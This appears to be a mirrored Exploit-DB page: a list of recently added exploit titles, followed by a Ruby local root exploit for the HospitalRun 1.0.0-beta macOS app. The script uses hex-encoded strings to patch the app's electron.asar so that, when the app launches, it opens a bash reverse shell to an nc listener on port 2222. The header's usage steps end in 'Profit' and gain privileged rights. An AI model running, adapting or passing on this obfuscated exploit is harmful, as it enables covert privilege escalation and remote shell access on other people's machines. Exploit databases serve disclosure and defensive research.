bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/macos/local/51310.rb
Exploit-DB d7c9ba572a DB: 2023-04-07 
50 changes to exploits/shellcodes/ghdb

Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI

ABUS Security Camera TVIP 20000-21150 - LFI_ RCE and SSH Root Access

Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection
Osprey Pump Controller 1.0.1 - (pseudonym) Semi-blind Command Injection
Osprey Pump Controller 1.0.1 - (userName) Blind Command Injection
Osprey Pump Controller 1.0.1 - Administrator Backdoor Access
Osprey Pump Controller 1.0.1 - Authentication Bypass Credentials Modification
Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery
Osprey Pump Controller 1.0.1 - Predictable Session Token / Session Hijack
Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure
Osprey Pump Controller 1.0.1 - Unauthenticated Remote Code Execution Exploit
Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS

WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE

HospitalRun  1.0.0-beta - Local Root Exploit for macOS

Adobe Connect 10 - Username Disclosure

craftercms 4.x.x - CORS

EasyNas 1.1.0 - OS Command Injection

Agilebio Lab Collector Electronic Lab Notebook  v4.234 - Remote Code Execution (RCE)

Art Gallery Management System Project in PHP v 1.0 - SQL injection

atrocore 1.5.25 User interaction - Unauthenticated File upload - RCE
Auto Dealer Management System 1.0 - Broken Access Control Exploit
Auto Dealer Management System v1.0 - SQL Injection
Auto Dealer Management System v1.0 - SQL Injection in sell_vehicle.php
Auto Dealer Management System v1.0 - SQL Injection on manage_user.php
Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload
Best pos Management System v1.0 - SQL Injection

ChurchCRM v4.5.3-121fcc1 - SQL Injection

Dompdf 1.2.1 - Remote Code Execution (RCE)
Employee Task Management System v1.0 - Broken Authentication
Employee Task Management System v1.0 - SQL Injection on (task-details.php?task_id=?)
Employee Task Management System v1.0 - SQL Injection on edit-task.php

flatnux 2021-03.25 - Remote Code Execution (Authenticated)

Intern Record System v1.0 - SQL Injection (Unauthenticated)

Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking

LDAP Tool Box Self Service Password v1.5.2 -  Account takeover
Music Gallery Site v1.0 - Broken Access Control
Music Gallery Site v1.0 - SQL Injection on  music_list.php
Music Gallery Site v1.0 - SQL Injection on page Master.php
Music Gallery Site v1.0 - SQL Injection on page view_music_details.php

POLR URL 2.3.0 - Shortener Admin Takeover

Purchase Order Management-1.0 - Local File Inclusion

Simple Food Ordering System v1.0 - Cross-Site Scripting (XSS)

Simple Task Managing System v1.0 - SQL Injection (Unauthenticated)

modoboa  2.0.4 - Admin TakeOver

pdfkit v0.8.7.2 - Command Injection

FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking

Windows 11 10.0.22000 -  Backup service Privilege Escalation

TitanFTP 2.0.1.2102 - Path traversal to Remote Code Execution (RCE)

Unified Remote 3.13.0 - Remote Code Execution (RCE)
2023-04-07 00:16:28 +00:00

55 lines
No EOL
2 KiB
Ruby
Executable file
Raw Blame History

# Exploit Title: HospitalRun 1.0.0-beta - Local Root Exploit for macOS
# Written by Jean Pereira <info@cytres.com>
# Date: 2023/03/04
# Vendor Homepage: https://hospitalrun.io
# Software Link: https://github.com/HospitalRun/hospitalrun-frontend/releases/download/1.0.0-beta/HospitalRun.dmg
# Version: 1.0.0-beta
# Tested on: macOS Ventura 13.2.1 (22D68)
# Impact: Command Execution, Privilege Escalation
# Instructions:
# Run local TCP listener with (e.g. nc -l 2222)
# Run exploit
# Wait for HospitalRun to be executed
# Profit (privileged rights e.g. root are gained)
# Hotfix: Remove write permissions from electron.asar to patch this vulnerability
# Exploit:
buffer = "\x63\x6F\x6E\x73\x74\x20\x72\x65\x6E" +
"\x64\x65\x72\x50\x72\x6F\x63\x65\x73" +
"\x73\x50\x72\x65\x66\x65\x72\x65\x6E" +
"\x63\x65\x73\x20\x3D\x20\x70\x72\x6F" +
"\x63\x65\x73\x73\x2E\x61\x74\x6F\x6D" +
"\x42\x69\x6E\x64\x69\x6E\x67\x28\x27" +
"\x72\x65\x6E\x64\x65\x72\x5F\x70\x72" +
"\x6F\x63\x65\x73\x73\x5F\x70\x72\x65" +
"\x66\x65\x72\x65\x6E\x63\x65\x73\x27" +
"\x29\x2E\x66\x6F\x72\x41\x6C\x6C\x57" +
"\x65\x62\x43\x6F\x6E\x74\x65\x6E\x74" +
"\x73\x28\x29"
payload = "\x72\x65\x71\x75\x69\x72\x65\x28\x22" +
"\x63\x68\x69\x6C\x64\x5F\x70\x72\x6F" +
"\x63\x65\x73\x73\x22\x29\x2E\x65\x78" +
"\x65\x63\x53\x79\x6E\x63\x28\x22\x2F" +
"\x62\x69\x6E\x2F\x62\x61\x73\x68\x20" +
"\x2D\x63\x20\x27\x65\x78\x65\x63\x20" +
"\x62\x61\x73\x68\x20\x2D\x69\x20\x3E" +
"\x2F\x64\x65\x76\x2F\x74\x63\x70\x2F" +
"\x30\x2E\x30\x2E\x30\x2E\x30\x2F\x32" +
"\x32\x32\x32\x20\x30\x3E\x26\x31\x27" +
"\x22\x29"
nopsled = "\x2F\x2A\x2A\x2A\x2A" +
"\x2A\x2A\x2A\x2A\x2F"
File.open("/Applications/HospitalRun.app/Contents/Resources/electron.asar", "rb+") do |file|
electron = file.read
electron.gsub!(buffer, payload + nopsled)
file.pos = 0
file.write(electron)
end
Reference in a new issue View git blame Copy permalink